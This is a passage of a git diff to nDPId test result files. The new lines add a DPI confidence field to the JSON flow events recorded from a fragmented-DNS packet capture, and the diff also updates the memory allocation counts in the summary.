-00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
+00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00817{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1560869916459,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"ts_msec":1560869916459,"pkt":"CFsOoYNeAAwpfKTLht1gAxE1ADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER1T4ANQA07tzo3wEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAEAACkCAAAAAAAAAA=="}
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1560869916473,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":122,"pkt_l4_len":68,"ts_msec":1560869916473,"pkt":"AAwpfKTLCFsOoYNeht1gCEAKAEQRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXVPgBEGsro34GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAHADAABAAEAAA4QAATC9wUOAAApBawAAAAAAAA="}
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}}
+00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00719{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","total-events-serialized":145}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 66/59
@@ -151,9 +151,9 @@
 ~~ total active/idle flows...: 21/21
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4620540 bytes
-~~ total memory freed........: 4620540 bytes
-~~ total allocations/frees...: 99672/99672
+~~ total memory allocated....: 4698933 bytes
+~~ total memory freed........: 4698933 bytes
+~~ total allocations/frees...: 101262/101262
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
 ~~ json string max len.......: 2439 chars
diff --git a/test/results/dns_invert_query.pcapng.out b/test/results/dns_invert_query.pcapng.out
index 2b6cc1334..b7d2ea919 100644
--- a/test/results/dns_invert_query.pcapng.out
+++ b/test/results/dns_invert_query.pcapng.out
@@ -1,7 +1,7 @@
 00450{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_invert_query.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
